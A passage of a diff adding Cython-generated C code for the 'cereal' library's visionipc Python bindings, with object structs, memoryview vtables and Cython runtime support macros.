__pyx_e_6cereal_9visionipc_13visionipc_pyx_VISION_STREAM_ROAD, + __pyx_e_6cereal_9visionipc_13visionipc_pyx_VISION_STREAM_DRIVER, + __pyx_e_6cereal_9visionipc_13visionipc_pyx_VISION_STREAM_WIDE_ROAD, + __pyx_e_6cereal_9visionipc_13visionipc_pyx_VISION_STREAM_MAP +}; + +/* "cereal/visionipc/visionipc_pyx.pxd":6 + * from .visionipc cimport VisionBuf as cppVisionBuf + * + * cdef class VisionBuf: # <<<<<<<<<<<<<< + * cdef cppVisionBuf * buf + * + */ +struct __pyx_obj_6cereal_9visionipc_13visionipc_pyx_VisionBuf { + PyObject_HEAD + struct __pyx_vtabstruct_6cereal_9visionipc_13visionipc_pyx_VisionBuf *__pyx_vtab; + VisionBuf *buf; +}; + + +/* "cereal/visionipc/visionipc_pyx.pyx":63 + * + * + * cdef class VisionIpcServer: # <<<<<<<<<<<<<< + * cdef cppVisionIpcServer * server + * + */ +struct __pyx_obj_6cereal_9visionipc_13visionipc_pyx_VisionIpcServer { + PyObject_HEAD + VisionIpcServer *server; +}; + + +/* "cereal/visionipc/visionipc_pyx.pyx":97 + * + * + * cdef class VisionIpcClient: # <<<<<<<<<<<<<< + * cdef cppVisionIpcClient * client + * cdef VisionIpcBufExtra extra + */ +struct __pyx_obj_6cereal_9visionipc_13visionipc_pyx_VisionIpcClient { + PyObject_HEAD + VisionIpcClient *client; + struct VisionIpcBufExtra extra; +}; + + +/* "EnumBase":16 + * + * @cython.internal + * cdef class __Pyx_EnumMeta(type): # <<<<<<<<<<<<<< + * def __init__(cls, name, parents, dct): + * type.__init__(cls, name, parents, dct) + */ +struct __pyx_obj___Pyx_EnumMeta { + PyHeapTypeObject __pyx_base; +}; + + +/* "View.MemoryView":114 + * @cython.collection_type("sequence") + * @cname("__pyx_array") + * cdef class array: # <<<<<<<<<<<<<< + * + * cdef: + */ +struct __pyx_array_obj { + PyObject_HEAD + struct __pyx_vtabstruct_array *__pyx_vtab; + char *data; + Py_ssize_t len; + char *format; + int ndim; + Py_ssize_t *_shape; + Py_ssize_t *_strides; + Py_ssize_t itemsize; + PyObject *mode; + PyObject *_format; + void (*callback_free_data)(void *); + int free_data; + int dtype_is_object; +}; + + +/* "View.MemoryView":302 + * + * @cname('__pyx_MemviewEnum') + * cdef class Enum(object): # <<<<<<<<<<<<<< + * cdef object name + * def __init__(self, name): + */ +struct __pyx_MemviewEnum_obj { + PyObject_HEAD + PyObject *name; +}; + + +/* "View.MemoryView":337 + * + * @cname('__pyx_memoryview') + * cdef class memoryview: # <<<<<<<<<<<<<< + * + * cdef object obj + */ +struct __pyx_memoryview_obj { + PyObject_HEAD + struct __pyx_vtabstruct_memoryview *__pyx_vtab; + PyObject *obj; + PyObject *_size; + PyObject *_array_interface; + PyThread_type_lock lock; + __pyx_atomic_int_type acquisition_count; + Py_buffer view; + int flags; + int dtype_is_object; + __Pyx_TypeInfo *typeinfo; +}; + + +/* "View.MemoryView":952 + * @cython.collection_type("sequence") + * @cname('__pyx_memoryviewslice') + * cdef class _memoryviewslice(memoryview): # <<<<<<<<<<<<<< + * "Internal class for passing memoryview slices to Python" + * + */ +struct __pyx_memoryviewslice_obj { + struct __pyx_memoryview_obj __pyx_base; + __Pyx_memviewslice from_slice; + PyObject *from_object; + PyObject *(*to_object_func)(char *); + int (*to_dtype_func)(char *, PyObject *); +}; + + + +/* "View.MemoryView":114 + * @cython.collection_type("sequence") + * @cname("__pyx_array") + * cdef class array: # <<<<<<<<<<<<<< + * + * cdef: + */ + +struct __pyx_vtabstruct_array { + PyObject *(*get_memview)(struct __pyx_array_obj *); +}; +static struct __pyx_vtabstruct_array *__pyx_vtabptr_array; + + +/* "cereal/visionipc/visionipc_pyx.pyx":31 + * + * + * cdef class VisionBuf: # <<<<<<<<<<<<<< + * @staticmethod + * cdef create(cppVisionBuf * cbuf): + */ + +struct __pyx_vtabstruct_6cereal_9visionipc_13visionipc_pyx_VisionBuf { + PyObject *(*create)(VisionBuf *); +}; +static struct __pyx_vtabstruct_6cereal_9visionipc_13visionipc_pyx_VisionBuf *__pyx_vtabptr_6cereal_9visionipc_13visionipc_pyx_VisionBuf; + + +/* "View.MemoryView":337 + * + * @cname('__pyx_memoryview') + * cdef class memoryview: # <<<<<<<<<<<<<< + * + * cdef object obj + */ + +struct __pyx_vtabstruct_memoryview { + char *(*get_item_pointer)(struct __pyx_memoryview_obj *, PyObject *); + PyObject *(*is_slice)(struct __pyx_memoryview_obj *, PyObject *); + PyObject *(*setitem_slice_assignment)(struct __pyx_memoryview_obj *, PyObject *, PyObject *); + PyObject *(*setitem_slice_assign_scalar)(struct __pyx_memoryview_obj *, struct __pyx_memoryview_obj *, PyObject *); + PyObject *(*setitem_indexed)(struct __pyx_memoryview_obj *, PyObject *, PyObject *); + PyObject *(*convert_item_to_object)(struct __pyx_memoryview_obj *, char *); + PyObject *(*assign_item_from_object)(struct __pyx_memoryview_obj *, char *, PyObject *); + PyObject *(*_get_base)(struct __pyx_memoryview_obj *); +}; +static struct __pyx_vtabstruct_memoryview *__pyx_vtabptr_memoryview; + + +/* "View.MemoryView":952 + * @cython.collection_type("sequence") + * @cname('__pyx_memoryviewslice') + * cdef class _memoryviewslice(memoryview): # <<<<<<<<<<<<<< + * "Internal class for passing memoryview slices to Python" + * + */ + +struct __pyx_vtabstruct__memoryviewslice { + struct __pyx_vtabstruct_memoryview __pyx_base; +}; +static struct __pyx_vtabstruct__memoryviewslice *__pyx_vtabptr__memoryviewslice; +/* #### Code section: utility_code_proto ### */ + +/* --- Runtime support code (head) --- */ +/* Refnanny.proto */ +#ifndef CYTHON_REFNANNY + #define CYTHON_REFNANNY 0 +#endif +#if CYTHON_REFNANNY + typedef struct { + void (*INCREF)(void*, PyObject*, Py_ssize_t); + void (*DECREF)(void*, PyObject*, Py_ssize_t); + void (*GOTREF)(void*, PyObject*, Py_ssize_t); + void (*GIVEREF)(void*, PyObject*, Py_ssize_t); + void* (*SetupContext)(const char*, Py_ssize_t, const char*); + void (*FinishContext)(void**); + } __Pyx_RefNannyAPIStruct; + static __Pyx_RefNannyAPIStruct *__Pyx_RefNanny = NULL; + static __Pyx_RefNannyAPIStruct *__Pyx_RefNannyImportAPI(const char *modname); + #define __Pyx_RefNannyDeclarations void *__pyx_refnanny = NULL; +#ifdef WITH_THREAD + #define __Pyx_RefNannySetupContext(name, acquire_gil)\ + if (acquire_gil) {\ + PyGILState_STATE __pyx_gilstate_save = PyGILState_Ensure();\ + __pyx_refnanny = __Pyx_RefNanny->SetupContext((name), (__LINE__), (__FILE__));\ + PyGILState_Release(__pyx_gilstate_save);\ + } else {\ + __pyx_refnanny = __Pyx_RefNanny->SetupContext((name), (__LINE__), (__FILE__));\ + } + #define __Pyx_RefNannyFinishContextNogil() {\ + PyGILState_STATE __pyx_gilstate_save = PyGILState_Ensure();\ + __Pyx_RefNannyFinishContext();\ + PyGILState_Release(__pyx_gilstate_save);\ + } +#else + #define __Pyx_RefNannySetupContext(name, acquire_gil)\ + __pyx_refnanny = __Pyx_RefNanny->SetupContext((name), (__LINE__), (__FILE__)) + #define __Pyx_RefNannyFinishContextNogil() __Pyx_RefNannyFinishContext() +#endif + #define __Pyx_RefNannyFinishContextNogil() {\ + PyGILState_STATE __pyx_gilstate_save = PyGILState_Ensure();\ + __Pyx_RefNannyFinishContext();\ + PyGILState_Release(__pyx_gilstate_save);\ + } + #define __Pyx_RefNannyFinishContext()\ + __Pyx_RefNanny->FinishContext(&__pyx_refnanny) + #define __Pyx_INCREF(r) __Pyx_RefNanny->INCREF(__pyx_refnanny, (PyObject *)(r), (__LINE__)) + #define __Pyx_DECREF(r) __Pyx_RefNanny->DECREF(__pyx_refnanny, (PyObject *)(r), (__LINE__)) + #define __Pyx_GOTREF(r) __Pyx_RefNanny->GOTREF(__pyx_refnanny, (PyObject *)(r), (__LINE__)) + #define __Pyx_GIVEREF(r) __Pyx_RefNanny->GIVEREF(__pyx_refnanny, (PyObject *)(r), (__LINE__)) + #define __Pyx_XINCREF(r) do { if((r) == NULL); else {__Pyx_INCREF(r); }} while(0) + #define __Pyx_XDECREF(r) do { if((r) == NULL); else {__Pyx_DECREF(r); }} while(0) + #define __Pyx_XGOTREF(r) do { if((r) == NULL); else {__Pyx_GOTREF(r); }} while(0) + #define __Pyx_XGIVEREF(r) do { if((r) == NULL); else {__Pyx_GIVEREF(r);}} while(0) +#else + #define __Pyx_RefNannyDeclarations + #define __Pyx_RefNannySetupContext(name, acquire_gil) + #define __Pyx_RefNannyFinishContextNogil() + #define __Pyx_RefNannyFinishContext() + #define __Pyx_INCREF(r) Py_INCREF(r) + #define __Pyx_DECREF(r) Py_DECREF(r) + #define __Pyx_GOTREF(r) + #define __Pyx_GIVEREF(r) + #define __Pyx_XINCREF(r) Py_XINCREF(r) + #define __Pyx_XDECREF(r) Py_XDECREF(r) + #define __Pyx_XGOTREF(r) + #define __Pyx_XGIVEREF(r) +#endif +#define __Pyx_Py_XDECREF_SET(r, v) do {\ + PyObject *tmp = (PyObject *) r;\ + r = v; Py_XDECREF(tmp);\ + } while (0) +#define __Pyx_XDECREF_SET(r, v) do {\ + PyObject *tmp = (PyObject *) r;\ + r = v; __Pyx_XDECREF(tmp);\ + } while (0) +#define __Pyx_DECREF_SET(r, v) do {\ + PyObject *tmp = (PyObject *) r;\ + r = v; __Pyx_DECREF(tmp);\ + } while (0) +#define __Pyx_CLEAR(r) do { PyObject* tmp = ((PyObject*)(r)); r = NULL; __Pyx_DECREF(tmp);} while(0) +#define __Pyx_XCLEAR(r) do { if((r) != NULL) {PyObject* tmp = ((PyObject*)(r)); r = NULL; __Pyx_DECREF(tmp);}} while(0) + +/* PyErrExceptionMatches.proto */ +#if CYTHON_FAST_THREAD_STATE +#define __Pyx_PyErr_ExceptionMatches(err) __Pyx_PyErr_ExceptionMatchesInState(__pyx_tstate, err) +static CYTHON_INLINE int __Pyx_PyErr_ExceptionMatchesInState(PyThreadState* tstate, PyObject* err); +#else +#define __Pyx_PyErr_ExceptionMatches(err) PyErr_ExceptionMatches(err) +#endif + +/* PyThreadStateGet.proto */ +#if CYTHON_FAST_THREAD_STATE +#define __Pyx_PyThreadState_declare PyThreadState *__pyx_tstate; +#define __Pyx_PyThreadState_assign __pyx_tstate = __Pyx_PyThreadState_Current; +#if PY_VERSION_HEX >= 0x030C00A6 +#define __Pyx_PyErr_Occurred() (__pyx_tstate->current_exception != NULL) +#define __Pyx_PyErr_CurrentExceptionType() (__pyx_tstate->current_exception ? (PyObject*) Py_TYPE(__pyx_tstate->current_exception) : (PyObject*) NULL) +#else +#define __Pyx_PyErr_Occurred() (__pyx_tstate->curexc_type != NULL) +#define __Pyx_PyErr_CurrentExceptionType() (__pyx_tstate->curexc_type) +#endif +#else +#define __Pyx_PyThreadState_declare +#define __Pyx_PyThreadState_assign +#define __Pyx_PyErr_Occurred() (PyErr_Occurred() != NULL) +#define __Pyx_PyErr_CurrentExceptionType() PyErr_Occurred() +#endif + +/* PyErrFetchRestore.proto */ +#if CYTHON_FAST_THREAD_STATE +#define __Pyx_PyErr_Clear() __Pyx_ErrRestore(NULL, NULL, NULL) +#define __Pyx_ErrRestoreWithState(type, value, tb) __Pyx_ErrRestoreInState(PyThreadState_GET(), type, value, tb) +#define __Pyx_ErrFetchWithState(type, value, tb) __Pyx_ErrFetchInState(PyThreadState_GET(), type, value, tb) +#define __Pyx_ErrRestore(type, value, tb) __Pyx_ErrRestoreInState(__pyx_tstate, type, value, tb) +#define __Pyx_ErrFetch(type, value, tb) __Pyx_ErrFetchInState(__pyx_tstate, type, value, tb) +static CYTHON_INLINE void __Pyx_ErrRestoreInState(PyThreadState *tstate, PyObject *type, PyObject *value, PyObject *tb); +static CYTHON_INLINE void __Pyx_ErrFetchInState(PyThreadState *tstate, PyObject **type, PyObject **value, PyObject **tb); +#if CYTHON_COMPILING_IN_CPYTHON && PY_VERSION_HEX < 0x030C00A6 +#define __Pyx_PyErr_SetNone(exc) (Py_INCREF(exc), __Pyx_ErrRestore((exc), NULL, NULL)) +#else +#define __Pyx_PyErr_SetNone(exc) PyErr_SetNone(exc) +#endif +#else +#define __Pyx_PyErr_Clear() PyErr_Clear() +#define __Pyx_PyErr_SetNone(exc) PyErr_SetNone(exc) +#define __Pyx_ErrRestoreWithState(type, value, tb) PyErr_Restore(type, value, tb) +#define __Pyx_ErrFetchWithState(type, value, tb) PyErr_Fetch(type, value, tb) +#define __Pyx_ErrRestoreInState(tstate, type, value, tb) PyErr_Restore(type, value, tb) +#define __Pyx_ErrFetchInState(tstate, type, value, tb) PyErr_Fetch(type, value, tb) +#define __Pyx_ErrRestore(type, value, tb) PyErr_Restore(type, value, tb) +#define __Pyx_ErrFetch(type, value, tb) PyErr_Fetch(type, value, tb) +#endif + +/* PyObjectGetAttrStr.proto */ +#if CYTHON_USE_TYPE_SLOTS +static CYTHON_INLINE PyObject* __Pyx_PyObject_GetAttrStr(PyObject* obj, PyObject* attr_name); +#else +#define __Pyx_PyObject_GetAttrStr(o,n) PyObject_GetAttr(o,n) +#endif + +/* PyObjectGetAttrStrNoError.proto */ +static CYTHON_INLINE PyObject* __Pyx_PyObject_GetAttrStrNoError(PyObject* obj, PyObject* attr_name); + +/* GetBuiltinName.proto */ +static PyObject *__Pyx_GetBuiltinName(PyObject *name); + +/* TupleAndListFromArray.proto */ +#if CYTHON_COMPILING_IN_CPYTHON +static CYTHON_INLINE PyObject* __Pyx_PyList_FromArray(PyObject *const *src, Py_ssize_t n); +static CYTHON_INLINE PyObject* __Pyx_PyTuple_FromArray(PyObject *const *src, Py_ssize_t n); +#endif + +/* IncludeStringH.proto */ +#include + +/* BytesEquals.proto */ +static CYTHON_INLINE int __Pyx_PyBytes_Equals(PyObject* s1, PyObject* s2, int equals); + +/* UnicodeEquals.proto */ +static CYTHON_INLINE int __Pyx_PyUnicode_Equals(PyObject* s1, PyObject* s2, int equals); + +/* fastcall.proto */ +#define __Pyx_Arg_VARARGS(args, i) PyTuple_GET_ITEM(args, i) +#define __Pyx_NumKwargs_VARARGS(kwds) PyDict_Size(kwds) +#define __Pyx_KwValues_VARARGS(args, nargs) NULL +#define __Pyx_GetKwValue_VARARGS(kw, kwvalues, s) __Pyx_PyDict_GetItemStrWithError(kw, s) +#define __Pyx_KwargsAsDict_VARARGS(kw, kwvalues) PyDict_Copy(kw) +#if CYTHON_METH_FASTCALL + #define __Pyx_Arg_FASTCALL(args, i) args[i] + #define __Pyx_NumKwargs_FASTCALL(kwds) PyTuple_GET_SIZE(kwds) + #define __Pyx_KwValues_FASTCALL(args, nargs) ((args) + (nargs)) + static CYTHON_INLINE PyObject * __Pyx_GetKwValue_FASTCALL(PyObject *kwnames, PyObject *const *kwvalues, PyObject *s); + #define __Pyx_KwargsAsDict_FASTCALL(kw, kwvalues) _PyStack_AsDict(kwvalues, kw) +#else + #define __Pyx_Arg_FASTCALL __Pyx_Arg_VARARGS + #define __Pyx_NumKwargs_FASTCALL __Pyx_NumKwargs_VARARGS + #define __Pyx_KwValues_FASTCALL __Pyx_KwValues_VARARGS + #define __Pyx_GetKwValue_FASTCALL __Pyx_GetKwValue_VARARGS + #define __Pyx_KwargsAsDict_FASTCALL __Pyx_KwargsAsDict_VARARGS +#endif +#if CYTHON_COMPILING_IN_CPYTHON +#define __Pyx_ArgsSlice_VARARGS(args, start, stop) __Pyx_PyTuple_FromArray(&__Pyx_Arg_VARARGS(args, start), stop - start) +#define __Pyx_ArgsSlice_FASTCALL(args, start, stop) __Pyx_PyTuple_FromArray(&__Pyx_Arg_FASTCALL(args, start), stop - start) +#else +#define __Pyx_ArgsSlice_VARARGS(args, start, stop) PyTuple_GetSlice(args, start, stop) +#define __Pyx_ArgsSlice_FASTCALL(args, start, stop) PyTuple_GetSlice(args, start, stop) +#endif + +/* RaiseArgTupleInvalid.proto */ +static void __Pyx_RaiseArgtupleInvalid(const char* func_name, int exact, + Py_ssize_t num_min, Py_ssize_t num_max, Py_ssize_t num_found); + +/* RaiseDoubleKeywords.proto */ +static void __Pyx_RaiseDoubleKeywordsError(const char* func_name, PyObject* kw_name); + +/* ParseKeywords.proto */ +static int __Pyx_ParseOptionalKeywords(PyObject *kwds, PyObject *const *kwvalues, + PyObject **argnames[], + PyObject *kwds2, PyObject *values[], Py_ssize_t num_pos_args, + const char* function_name); + +/* PyFunctionFastCall.proto */ +#if CYTHON_FAST_PYCALL +#if !CYTHON_VECTORCALL +#define __Pyx_PyFunction_FastCall(func, args, nargs)\ + __Pyx_PyFunction_FastCallDict((func), (args), (nargs), NULL) +static PyObject *__Pyx_PyFunction_FastCallDict(PyObject *func, PyObject **args, Py_ssize_t nargs, PyObject *kwargs); +#endif +#define __Pyx_BUILD_ASSERT_EXPR(cond)\ + (sizeof(char [1 - 2*!(cond)]) - 1) +#ifndef Py_MEMBER_SIZE +#define Py_MEMBER_SIZE(type, member) sizeof(((type *)0)->member) +#endif +#if !CYTHON_VECTORCALL +#if PY_VERSION_HEX >= 0x03080000 + #include "frameobject.h" +#if PY_VERSION_HEX >= 0x030b00a6 + #ifndef Py_BUILD_CORE + #define Py_BUILD_CORE 1 + #endif + #include "internal/pycore_frame.h" +#endif + #define __Pxy_PyFrame_Initialize_Offsets() + #define __Pyx_PyFrame_GetLocalsplus(frame) ((frame)->f_localsplus) +#else + static size_t __pyx_pyframe_localsplus_offset = 0; + #include "frameobject.h" + #define __Pxy_PyFrame_Initialize_Offsets()\ + ((void)__Pyx_BUILD_ASSERT_EXPR(sizeof(PyFrameObject) == offsetof(PyFrameObject, f_localsplus) + Py_MEMBER_SIZE(PyFrameObject, f_localsplus)),\ + (void)(__pyx_pyframe_localsplus_offset = ((size_t)PyFrame_Type.tp_basicsize) - Py_MEMBER_SIZE(PyFrameObject, f_localsplus))) + #define __Pyx_PyFrame_GetLocalsplus(frame)\ + (assert(__pyx_pyframe_localsplus_offset), (PyObject **)(((char *)(frame)) + __pyx_pyframe_localsplus_offset)) +#endif +#endif +#endif + +/* PyObjectCall.proto */ +#if CYTHON_COMPILING_IN_CPYTHON +static CYTHON_INLINE PyObject* __Pyx_PyObject_Call(PyObject *func, PyObject *arg, PyObject *kw); +#else +#define __Pyx_PyObject_Call(func, arg, kw) PyObject_Call(func, arg, kw) +#endif + +/* PyObjectCallMethO.proto */ +#if CYTHON_COMPILING_IN_CPYTHON +static CYTHON_INLINE PyObject* __Pyx_PyObject_CallMethO(PyObject *func, PyObject *arg); +#endif + +/* PyObjectFastCall.proto */ +#define __Pyx_PyObject_FastCall(func, args, nargs) __Pyx_PyObject_FastCallDict(func, args, (size_t)(nargs), NULL) +static CYTHON_INLINE PyObject* __Pyx_PyObject_FastCallDict(PyObject *func, PyObject **args, size_t nargs, PyObject *kwargs); + +/* PyObjectSetAttrStr.proto */ +#if CYTHON_USE_TYPE_SLOTS +#define __Pyx_PyObject_DelAttrStr(o,n) __Pyx_PyObject_SetAttrStr(o, n, NULL) +static CYTHON_INLINE int __Pyx_PyObject_SetAttrStr(PyObject* obj, PyObject* attr_name, PyObject* value); +#else +#define __Pyx_PyObject_DelAttrStr(o,n) PyObject_DelAttr(o,n) +#define __Pyx_PyObject_SetAttrStr(o,n,v) PyObject_SetAttr(o,n,v) +#endif + +/* GetItemInt.proto */ +#define __Pyx_GetItemInt(o, i, type, is_signed, to_py_func, is_list, wraparound, boundscheck)\ + (__Pyx_fits_Py_ssize_t(i, type, is_signed) ?\ + __Pyx_GetItemInt_Fast(o, (Py_ssize_t)i, is_list, wraparound, boundscheck) :\ + (is_list ? (PyErr_SetString(PyExc_IndexError, "list index out of range"), (PyObject*)NULL) :\ + __Pyx_GetItemInt_Generic(o, to_py_func(i)))) +#define __Pyx_GetItemInt_List(o, i, type, is_signed, to_py_func, is_list, wraparound, boundscheck)\ + (__Pyx_fits_Py_ssize_t(i, type, is_signed) ?\ + __Pyx_GetItemInt_List_Fast(o, (Py_ssize_t)i, wraparound, boundscheck) :\ + (PyErr_SetString(PyExc_IndexError, "list index out of range"), (PyObject*)NULL)) +static CYTHON_INLINE PyObject *__Pyx_GetItemInt_List_Fast(PyObject *o, Py_ssize_t i, + int wraparound, int boundscheck); +#define __Pyx_GetItemInt_Tuple(o, i, type, is_signed, to_py_func, is_list, wraparound, boundscheck)\ + (__Pyx_fits_Py_ssize_t(i, type, is_signed) ?\ + __Pyx_GetItemInt_Tuple_Fast(o, (Py_ssize_t)i, wraparound, boundscheck) :\ + (PyErr_SetString(PyExc_IndexError, "tuple index out of range"), (PyObject*)NULL)) +static CYTHON_INLINE PyObject *__Pyx_GetItemInt_Tuple_Fast(PyObject *o, Py_ssize_t i, + int wraparound, int boundscheck); +static PyObject *__Pyx_GetItemInt_Generic(PyObject *o, PyObject* j); +static CYTHON_INLINE PyObject *__Pyx_GetItemInt_Fast(PyObject *o, Py_ssize_t i, + int is_list, int wraparound, int boundscheck); + +/* PyObjectCallOneArg.proto */ +static CYTHON_INLINE PyObject* __Pyx_PyObject_CallOneArg(PyObject *func, PyObject *arg); + +/* ObjectGetItem.proto */ +#if CYTHON_USE_TYPE_SLOTS +static CYTHON_INLINE PyObject *__Pyx_PyObject_GetItem(PyObject *obj, PyObject *key); +#else +#define __Pyx_PyObject_GetItem(obj, key) PyObject_GetItem(obj, key) +#endif + +/* KeywordStringCheck.proto */ +static int __Pyx_CheckKeywordStrings(PyObject *kw, const char* function_name, int kw_allowed); + +/* GetAttr3.proto */ +static CYTHON_INLINE PyObject *__Pyx_GetAttr3(PyObject *, PyObject *, PyObject *); + +/* PyDictVersioning.proto */ +#if CYTHON_USE_DICT_VERSIONS && CYTHON_USE_TYPE_SLOTS +#define __PYX_DICT_VERSION_INIT ((PY_UINT64_T) -1) +#define __PYX_GET_DICT_VERSION(dict) (((PyDictObject*)(dict))->ma_version_tag) +#define __PYX_UPDATE_DICT_CACHE(dict, value, cache_var, version_var)\ + (version_var) = __PYX_GET_DICT_VERSION(dict);\ + (cache_var) = (value); +#define __PYX_PY_DICT_LOOKUP_IF_MODIFIED(VAR, DICT, LOOKUP) {\ + static PY_UINT64_T __pyx_dict_version = 0;\ + static PyObject *__pyx_dict_cached_value = NULL;\ + if (likely(__PYX_GET_DICT_VERSION(DICT) == __pyx_dict_version)) {\ + (VAR) = __pyx_dict_cached_value;\ + } else {\ + (VAR) = __pyx_dict_cached_value = (LOOKUP);\ + __pyx_dict_version = __PYX_GET_DICT_VERSION(DICT);\ + }\ +} +static CYTHON_INLINE PY_UINT64_T __Pyx_get_tp_dict_version(PyObject *obj); +static CYTHON_INLINE PY_UINT64_T __Pyx_get_object_dict_version(PyObject *obj); +static CYTHON_INLINE int __Pyx_object_dict_version_matches(PyObject* obj, PY_UINT64_T tp_dict_version, PY_UINT64_T obj_dict_version); +#else +#define __PYX_GET_DICT_VERSION(dict) (0) +#define __PYX_UPDATE_DICT_CACHE(dict, value, cache_var, version_var) +#define __PYX_PY_DICT_LOOKUP_IF_MODIFIED(VAR, DICT, LOOKUP) (VAR) = (LOOKUP); +#endif + +/* GetModuleGlobalName.proto */ +#if CYTHON_USE_DICT_VERSIONS +#define __Pyx_GetModuleGlobalName(var, name) do {\ + static PY_UINT64_T __pyx_dict_version = 0;\ + static PyObject *__pyx_dict_cached_value = NULL;\ + (var) = (likely(__pyx_dict_version == __PYX_GET_DICT_VERSION(__pyx_d))) ?\ + (likely(__pyx_dict_cached_value) ? __Pyx_NewRef(__pyx_dict_cached_value) : __Pyx_GetBuiltinName(name)) :\ + __Pyx__GetModuleGlobalName(name, &__pyx_dict_version, &__pyx_dict_cached_value);\ +} while(0) +#define __Pyx_GetModuleGlobalNameUncached(var, name) do {\ + PY_UINT64_T __pyx_dict_version;\ + PyObject *__pyx_dict_cached_value;\ + (var) = __Pyx__GetModuleGlobalName(name, &__pyx_dict_version, &__pyx_dict_cached_value);\ +} while(0) +static PyObject *__Pyx__GetModuleGlobalName(PyObject *name, PY_UINT64_T *dict_version, PyObject **dict_cached_value); +#else +#define __Pyx_GetModuleGlobalName(var, name) (var) = __Pyx__GetModuleGlobalName(name) +#define __Pyx_GetModuleGlobalNameUncached(var, name) (var) = __Pyx__GetModuleGlobalName(name) +static CYTHON_INLINE PyObject *__Pyx__GetModuleGlobalName(PyObject *name); +#endif + +/* RaiseUnexpectedTypeError.proto */ +static int __Pyx_RaiseUnexpectedTypeError(const char *expected, PyObject *obj); + +/* RaiseException.proto */ +static void __Pyx_Raise(PyObject *type, PyObject *value, PyObject *tb, PyObject *cause); + +/* PySequenceContains.proto */ +static CYTHON_INLINE int __Pyx_PySequence_ContainsTF(PyObject* item, PyObject* seq, int eq) { + int result = PySequence_Contains(seq, item); + return unlikely(result < 0) ? result : (result == (eq == Py_EQ)); +} + +/* Import.proto */ +static PyObject *__Pyx_Import(PyObject *name, PyObject *from_list, int level); + +/* ImportFrom.proto */ +static PyObject* __Pyx_ImportFrom(PyObject* module, PyObject* name); + +/* GetAttr.proto */ +static CYTHON_INLINE PyObject *__Pyx_GetAttr(PyObject *, PyObject *); + +/* HasAttr.proto */ +static CYTHON_INLINE int __Pyx_HasAttr(PyObject *, PyObject *); + +/* ArgTypeTest.proto */ +#define __Pyx_ArgTypeTest(obj, type, none_allowed, name, exact)\ + ((likely(__Pyx_IS_TYPE(obj, type) | (none_allowed && (obj == Py_None)))) ? 1 :\ + __Pyx__ArgTypeTest(obj, type, name, exact)) +static int __Pyx__ArgTypeTest(PyObject *obj, PyTypeObject *type, const char *name, int exact); + +/* GCCDiagnostics.proto */ +#if !defined(__INTEL_COMPILER) && defined(__GNUC__) && (__GNUC__ > 4 || (__GNUC__ == 4 && __GNUC_MINOR__ >= 6)) +#define __Pyx_HAS_GCC_DIAGNOSTIC +#endif + +/* BuildPyUnicode.proto */ +static PyObject* __Pyx_PyUnicode_BuildFromAscii(Py_ssize_t ulength, char* chars, int clength, + int prepend_sign, char padding_char); + +/* CIntToPyUnicode.proto */ +static CYTHON_INLINE PyObject* __Pyx_PyUnicode_From_int(int value, Py_ssize_t width, char padding_char, char format_char); + +/* CIntToPyUnicode.proto */ +static CYTHON_INLINE PyObject* __Pyx_PyUnicode_From_Py_ssize_t(Py_ssize_t value, Py_ssize_t width, char padding_char, char format_char); + +/* JoinPyUnicode.proto */ +static PyObject* __Pyx_PyUnicode_Join(PyObject* value_tuple, Py_ssize_t value_count, Py_ssize_t result_ulength, + Py_UCS4 max_char); + +/* StrEquals.proto */ +#if PY_MAJOR_VERSION >= 3 +#define __Pyx_PyString_Equals __Pyx_PyUnicode_Equals +#else +#define __Pyx_PyString_Equals __Pyx_PyBytes_Equals +#endif + +/* PyObjectFormatSimple.proto */ +#if CYTHON_COMPILING_IN_PYPY + #define __Pyx_PyObject_FormatSimple(s, f) (\ + likely(PyUnicode_CheckExact(s)) ? (Py_INCREF(s), s) :\ + PyObject_Format(s, f)) +#elif PY_MAJOR_VERSION < 3 + #define __Pyx_PyObject_FormatSimple(s, f) (\ + likely(PyUnicode_CheckExact(s)) ? (Py_INCREF(s), s) :\ + likely(PyString_CheckExact(s)) ? PyUnicode_FromEncodedObject(s, NULL, "strict") :\ + PyObject_Format(s, f)) +#elif CYTHON_USE_TYPE_SLOTS + #define __Pyx_PyObject_FormatSimple(s, f) (\ + likely(PyUnicode_CheckExact(s)) ? (Py_INCREF(s), s) :\ + likely(PyLong_CheckExact(s)) ? PyLong_Type.tp_repr(s) :\ + likely(PyFloat_CheckExact(s)) ? PyFloat_Type.tp_repr(s) :\ + PyObject_Format(s, f)) +#else + #define __Pyx_PyObject_FormatSimple(s, f) (\ + likely(PyUnicode_CheckExact(s)) ? (Py_INCREF(s), s) :\ + PyObject_Format(s, f)) +#endif + +CYTHON_UNUSED static int __pyx_array_getbuffer(PyObject *__pyx_v_self, Py_buffer *__pyx_v_info, int __pyx_v_flags); /*proto*/ +static PyObject *__pyx_array_get_memview(struct __pyx_array_obj *); /*proto*/ +/* DivInt[Py_ssize_t].proto */ +static CYTHON_INLINE Py_ssize_t __Pyx_div_Py_ssize_t(Py_ssize_t, Py_ssize_t); + +/* UnaryNegOverflows.proto */ +#define __Pyx_UNARY_NEG_WOULD_OVERFLOW(x)\ + (((x) < 0) & ((unsigned long)(x) == 0-(unsigned long)(x))) + +/* AssertionsEnabled.proto */ +#define __Pyx_init_assertions_enabled() +#if CYTHON_COMPILING_IN_PYPY && PY_VERSION_HEX < 0x02070600 && !defined(Py_OptimizeFlag) + #define __pyx_assertions_enabled() (1) +#elif PY_VERSION_HEX < 0x03080000 || CYTHON_COMPILING_IN_PYPY || defined(Py_LIMITED_API) + #define __pyx_assertions_enabled() (!Py_OptimizeFlag) +#elif CYTHON_COMPILING_IN_CPYTHON && PY_VERSION_HEX >= 0x030900A6 + static int __pyx_assertions_enabled_flag; + #define __pyx_assertions_enabled() (__pyx_assertions_enabled_flag) + #undef __Pyx_init_assertions_enabled + static void __Pyx_init_assertions_enabled(void) { + __pyx_assertions_enabled_flag = ! _PyInterpreterState_GetConfig(__Pyx_PyThreadState_Current->interp)->optimization_level; + } +#else + #define __pyx_assertions_enabled() (!Py_OptimizeFlag) +#endif + +/* RaiseTooManyValuesToUnpack.proto */ +static CYTHON_INLINE void __Pyx_RaiseTooManyValuesError(Py_ssize_t expected); + +/* RaiseNeedMoreValuesToUnpack.proto */ +static CYTHON_INLINE void __Pyx_RaiseNeedMoreValuesError(Py_ssize_t index); + +/* RaiseNoneIterError.proto */ +static CYTHON_INLINE void __Pyx_RaiseNoneNotIterableError(void); + +/* ExtTypeTest.proto */ +static CYTHON_INLINE int __Pyx_TypeTest(PyObject *obj, PyTypeObject *type); + +/* GetTopmostException.proto */ +#if 